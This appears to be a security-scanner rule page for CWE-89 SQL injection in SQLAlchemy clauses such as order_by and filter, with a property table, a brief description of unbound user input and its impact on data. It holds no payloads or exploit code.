Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’)
| Property | |
|---|---|
| Language |  |
| Severity |  |
| CWE | CWE-89: Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) |
| OWASP | A01:2017 - Injection |
| Confidence Level | Medium |
| Impact Level | High |
| Likelihood Level | Low |
Description#
User input is being directly inserted into SQL clauses like group_by, order_by, distinct, having, or filter in SQLAlchemy without proper parameter binding. This allows attackers to manipulate SQL queries by injecting malicious input.
Impact#
Exploiting this vulnerability could let an attacker run arbitrary SQL commands against your database, potentially exposing, altering, or deleting sensitive data. It can result in data breaches, data loss, or unauthorized access to application functionality.